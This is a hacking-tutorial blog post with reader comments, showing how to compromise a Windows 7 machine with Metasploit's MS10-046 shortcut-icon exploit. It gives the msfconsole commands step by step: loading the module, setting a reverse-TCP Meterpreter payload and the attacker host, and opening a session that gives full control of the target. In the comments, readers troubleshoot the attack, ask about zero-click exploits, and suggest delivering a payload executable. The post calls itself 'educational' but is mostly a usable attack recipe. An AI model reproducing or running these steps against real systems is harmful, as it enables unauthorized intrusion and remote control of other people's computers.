LINUX DIGEST

A Linux Engineer and Security Researcher Blog

Hack Windows 7 with Metasploit using Kali Linux

Filed under: ETHICAL HACKING, KALI LINUX — 21 Comments

Today i am gonna show how to exploit any windows OS using metasploit. Exploiting a windows vulnerability to logging into the system with out
username and password using Metasploit.

Before Hacking, you want to know about metasploit framework. If your are new one to hacking, its less possible to know about Metasploit.

Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS
signature development.

Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target
machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Requirements:

1. MetaSploit Installed ( Kali Linux Distribution)

3. Two OS running either on same as virtual or physically different

4. Target host must not be running any AV

Machine 1: Host Kali Linux Machine

Machine 2: Target Windows 7 Machine

Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well-

supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and seĴing available in the
Framework; it’s like a one-stop shop for all of your exploitation dreams.

To launch msfconsole, enter msfconsole at the command line

#msfconsole
Now once you get the msf prompt type the below command and look for the module exploit/windows/browser
/ms10_046_shortcut_icon_dllloader.

An exploit is the means by which an aĴacker, or pen tester for that maĴer, takes advantage of a flaw within a system, an application, or a service.
An aĴacker uses an exploit to aĴack a system in a way that results in a particular desired outcome that the developer never intended.

Here above module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious
[Link] module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Now once we have found the desired module we will use this exploit by typing the below command.

#msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image

Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the
below command to set payload.

A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. A reverse shell is a payload that
creates a connection from the target machine back to the aĴacker as a Windows command prompt, whereas a bind shell is a payload that

“binds” a command prompt to a listening port on the target machine, which the aĴacker can then connect.

#msf > set payload windows/meterpreter/reverse_tcp

Now its time to do some configuration for the exploit/payload that we have just set. type the given command

#msf > show options

You should get below default output.

#msf > set SRVHOST [Link]

This will be your HOST IP address running metasploit.

#msf > set LHOST [Link]

This will be also be your HOST IP address running metasploit.

Now check if the above applied configuration is applied.

#msf > show options

#msf > exploit

Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)

On any Client machine simply open Internet Explorer and try to open hĴp://[Link]
Note: it will give your a pop-up asking from permission click ALLOW and Make sure you do not have any AntiVirus running on the target PC.

You can check the number of successful connected session by running the command sessons in msf console.

Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.

#meterpeter > session -i 1

Once connected type linux command to browse inside the System and have full control on it.
This Documentation is purely for educational purpose. so act with responsibility.

Tags: Ethical Hacking, exploit, Hacking, kali linux, metasploit framework, Microsoft Windows, msfconsole, payload, window 7, windows xp
Comments RSS (Really Simple Syndication) feed

21 Comments:

sid
July 7, 2014 at 12:01 pm
hey anther good one tutorial for hacking i looking this aĴack over internet , i try but failed so plz make tutorial on internet user. thanks

14

i
Rate This

Reply
Tamal Kundu
August 1, 2014 at 10:14 pm
Is it possible to get the meterpreter directly..i mean without any click or pinging…direct get the meterpreter of the terget machine….as we did
in case of xp by using
“”exploit/windows/smb/ms08_067_netapi””
please inform me
please help me

i
Rate This

Reply
Sathish Arthar
August 2, 2014 at 10:02 am
Yep it will connect directly to meterpreter , its an SMB vulnerability in windows XP , if the system is patched mean currently updated the
meterpreter will not work.

i
Rate This

Reply
decomboy
September 13, 2014 at 4:43 am
Very nice tutorial!!
I tried this using my laptop and my desktop with windows 7 as Target.
Everything went smoothly, just when I entered on hĴp://x.x.x.x(int the targeted computer), on the msfconsole(in the laptop) appeared
“Sending UNC redirect to x.x.x.x” but nothing more happened.
Did I do something wrong?
ms10_046_shortcut_icon_dllloader – Sending UNC redirect
Thanks

i
Rate This

Reply
 Joney
October 4, 2014 at 2:44 am
i have the same issue :( did you find a solution?

i
Rate This

Reply
poopyfacetomatonose
January 24, 2015 at 5:07 pm
open it in ie, it will resolve this issue

i
Rate This

Reply
Fatih
October 2, 2014 at 1:28 am
Yeah have the same problem here, You should tell us which Version of Windows 7 did you test with? And edition? and was it x86 or x64? and
what was the exact version of Internet explorer?

My lab stucked on ” Sending LNK file..”

Thank you so much

i
Rate This

Reply
Fatih
October 2, 2014 at 2:23 am
and what is the version of your rubygem please?

i
Rate This

Reply
Fatih
October 3, 2014 at 2:21 am
everybody in comment says they have failed. Wanna reply?

i
Rate This

Reply
BYOD
November 25, 2014 at 3:34 pm
Same problem as u guys, but good starting tutorial…
(he’s probably not gonna chew our food for us…)
 2

i
Rate This

Reply
monky
November 28, 2014 at 12:21 am
Bazzofia!

i
Rate This

Reply
asdfg
November 30, 2014 at 7:00 pm
It didn’t even work for me! it probably depends on the version of the browser and if the OS has been updated. what i would like to see is a
payload that works even if if was updated.

i
Rate This

Reply
[Link]
December 18, 2014 at 1:35 am
i am using kali linux (not virtual) so i have this when i exploit

msf exploit(firefox_xpi_bootstrapped_addon) > exploit

[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.

terminal shows this message,

i need the root directory for reverse_tcp in kali linux

i
Rate This

Reply
Người Đến Từ Bình Dương
December 20, 2014 at 11:51 am
Reblogged this on Người Đến Từ Bình Dương.

i
Rate This

Reply
Jack
December 20, 2014 at 6:55 pm
I cant run session -i 1 command..plz help… It says unknown command
 0

i
Rate This

Reply
laina gyvna
December 27, 2014 at 5:30 pm
The tutorial ‘s goot but the aĴack itself sucks. What kind of aĴack isthat when you need to switch off your fw and av? Definetely not a real life
aĴack.

i
Rate This

Reply
Xypher
January 10, 2015 at 11:24 am
NEED HELP.
All went swell than at the *exploit* command i failed to connect . here’s the error. ” [-] Exploit failed: REX::BindFailed The address is already in
use or unavailable: (Ip address).”
The computer i was trying to exploit was my laptop running windo 7 . I disabled the avg for a second than exited out any running browser and
ran the exploit on kali from a seperate computer and i got that error … what does it mean?

i
Rate This

Reply
ali
January 31, 2015 at 5:05 pm
is there away to hack it without sending a link or any thing else

i
Rate This

Reply
Adil Azad
March 31, 2015 at 6:19 pm
so good (Y) best i hv try this ..work good

i
Rate This

Reply
mI c0
April 3, 2015 at 2:33 pm
for those stuck at the sending lnk phase (after the victim opened the created file), make sure that the av (windows defender) is off… after the
victim made a session with your aĴacker, a meterpreter session should pop up after the sending command… verify the session number by
uploading the command “sessions”…
 0

i
Rate This

Reply
Seabride
April 23, 2015 at 7:53 pm
You guys should just create an exe file as the payload itself.
If you want to check if it works, upload it to a file hosting server and download it to the targeted pc and exploit it.

In this method you don’t need to configure the SRVHOST.

For a step by step, here is a great tutorial:

Hope I helped!

i
Rate This

Reply

Blog at [Link]. | The Motion Theme.

Follow “LINUX DIGEST”

Build a website with [Link]